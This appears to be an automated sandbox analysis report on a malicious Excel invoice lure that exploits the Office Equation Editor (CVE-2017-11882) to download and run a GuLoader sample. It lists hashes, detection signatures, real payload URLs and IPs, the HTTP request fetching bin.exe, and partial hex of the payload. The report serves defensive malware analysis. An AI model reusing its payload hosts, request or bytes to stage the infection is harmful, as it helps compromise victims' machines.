Windows Analysis Report Invoice Scan Copy.xlsx

Overview

General Information

Sample Name: Invoice Scan Copy.xlsx
Analysis ID: 482507
MD5: 026c63b9e090a6bf86cc8b6a4549290a
SHA1: 39fa74d1c7de05c25466cb057ba984ec08c0848b
SHA256: 6e6e60afa39ac72cca4e828ef18e8650105635cea693048061483b7e44f60497
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.688308642.00000000003F0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1lbI6ot82pXs)"}
Multi AV Scanner detection for submitted file
Source: Invoice Scan Copy.xlsx ReversingLabs: Detection: 25%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 28%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov edx, 31108335h 6_2_00401500
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00401500
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov edx, 31108335h 6_2_0040285A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_0040285A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402C37
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_004028E2
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402CBF
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402D4E
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402DC9
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402E4B
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402A14
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402EDD
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402A97
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402F51
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402B19
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov edx, 31108335h 6_2_004027D8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_004027D8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov ecx, ecx 6_2_00402B9A
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.141.149:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.141.149:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 69MB

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2019696 ET TROJAN Possible MalDoc Payload Download Nov 11 2014 192.168.2.22:49165 -> 192.3.141.149:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1lbI6ot82pXs)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:46:06 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Sun, 12 Sep 2021 19:01:15 GMTETag: "1c000-5cbd0f90d4415"Accept-Ranges: bytesContent-Length: 114688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 57 70 9a 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 50 00 00 00 00 00 00 00 15 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 42 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 10 00 00 2d 1b 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 68 01 00 28 00 00 00 00 80 01 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 5d 01 00 00 10 00 00 00 60 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 34 0a 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 31 00 00 00 80 01 00 00 40 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /monday/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 38D58F94.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D58F94.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /monday/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editingfrom the 17 . . yellow bar above This document is 18 I! T a protected 3. Once you h
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401500 6_2_00401500
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040285A 6_2_0040285A
Source: C:\Users\Public\vbc.exe Code function: 6_2_004028E2 6_2_004028E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402A14 6_2_00402A14
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402A97 6_2_00402A97
Source: C:\Users\Public\vbc.exe Code function: 6_2_004027D8 6_2_004027D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6429 6_2_003F6429
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9039 6_2_003F9039
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6433 6_2_003F6433
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3430 6_2_003F3430
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F582D 6_2_003F582D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003FA02B 6_2_003FA02B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9220 6_2_003F9220
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F621F 6_2_003F621F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3218 6_2_003F3218
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F7E13 6_2_003F7E13
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F520E 6_2_003F520E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F2272 6_2_003F2272
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F304A 6_2_003F304A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F42B9 6_2_003F42B9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F08B8 6_2_003F08B8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F98A2 6_2_003F98A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9888 6_2_003F9888
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9880 6_2_003F9880
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F22FF 6_2_003F22FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F06E2 6_2_003F06E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F52D0 6_2_003F52D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9735 6_2_003F9735
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8330 6_2_003F8330
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F4F28 6_2_003F4F28
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9518 6_2_003F9518
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F717B 6_2_003F717B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F4B7A 6_2_003F4B7A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F4F78 6_2_003F4F78
Source: C:\Users\Public\vbc.exe Code function: 6_2_003FA771 6_2_003FA771
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3562 6_2_003F3562
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F895A 6_2_003F895A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8F46 6_2_003F8F46
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9146 6_2_003F9146
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F01B7 6_2_003F01B7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F29A3 6_2_003F29A3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F419F 6_2_003F419F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F0B97 6_2_003F0B97
Source: C:\Users\Public\vbc.exe Code function: 6_2_003FAB91 6_2_003FAB91
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F5DFB 6_2_003F5DFB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F45F5 6_2_003F45F5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F53EA 6_2_003F53EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F47E2 6_2_003F47E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3DDD 6_2_003F3DDD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F2DD0 6_2_003F2DD0
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6429 NtAllocateVirtualMemory, 6_2_003F6429
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6433 NtAllocateVirtualMemory, 6_2_003F6433
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: bin[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Invoice Scan Copy.xlsx ReversingLabs: Detection: 25%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Invoice Scan Copy.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF601.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.winXLSX@4/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.688308642.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405C6C push cs; iretd 6_2_00405C6E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405026 push ss; retf 6_2_00405117
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407830 pushfd ; iretd 6_2_0040783B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040410D push cs; iretd 6_2_0040410E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405118 push ss; retf 6_2_00405137
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403DC2 push ss; retf 6_2_00403DC3
Source: C:\Users\Public\vbc.exe Code function: 6_2_004095EE push edi; retf 6_2_004095EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_004055A1 push cs; iretd 6_2_004055A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_004086FC push cs; retf 6_2_00408714
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404AB2 pushfd ; retf 6_2_00404AB3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403B71 pushfd ; iretd 6_2_00403B73
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407719 push edx; ret 6_2_00407724
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040532C pushad ; ret 6_2_004053CE
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405F32 push ecx; retf 6_2_00405F33
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405BC5 push cs; iretd 6_2_00405BC6
Source: C:\Users\Public\vbc.exe Code function: 6_2_004093E9 push cs; iretd 6_2_004093EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_004033F1 push ss; ret 6_2_004033F4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F0058 push edx; ret 6_2_003F005B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F00BA push edx; ret 6_2_003F00BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6384 push ebp; ret 6_2_003F6387

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184 Thread sleep time: -300000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8D84 rdtsc 6_2_003F8D84

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8D84 rdtsc 6_2_003F8D84
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401500 mov ebx, dword ptr fs:[00000030h] 6_2_00401500
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040285A mov ebx, dword ptr fs:[00000030h] 6_2_0040285A
Source: C:\Users\Public\vbc.exe Code function: 6_2_004027D8 mov ebx, dword ptr fs:[00000030h] 6_2_004027D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F882F mov eax, dword ptr fs:[00000030h] 6_2_003F882F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F6025 mov eax, dword ptr fs:[00000030h] 6_2_003F6025
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3218 mov eax, dword ptr fs:[00000030h] 6_2_003F3218
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F9735 mov eax, dword ptr fs:[00000030h] 6_2_003F9735
Source: C:\Users\Public\vbc.exe Code function: 6_2_003F8178 mov eax, dword ptr fs:[00000030h] 6_2_003F8178
